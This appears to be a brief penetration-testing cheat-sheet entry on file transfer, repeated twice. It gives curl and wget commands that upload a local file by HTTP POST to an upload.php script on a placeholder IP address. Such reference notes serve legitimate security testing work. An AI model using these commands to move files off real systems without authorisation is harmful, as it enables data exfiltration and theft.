See Security/Windows/File Transfer for a PHP script that support php://input
Curl
curl -F 'data=@[path to file]' http://[ip]/upload.php
Wget
wget --post-file [path to file] http://[ip]/upload.php
See Security/Windows/File Transfer for a PHP script that support php://input
curl -F 'data=@[path to file]' http://[ip]/upload.php
wget --post-file [path to file] http://[ip]/upload.php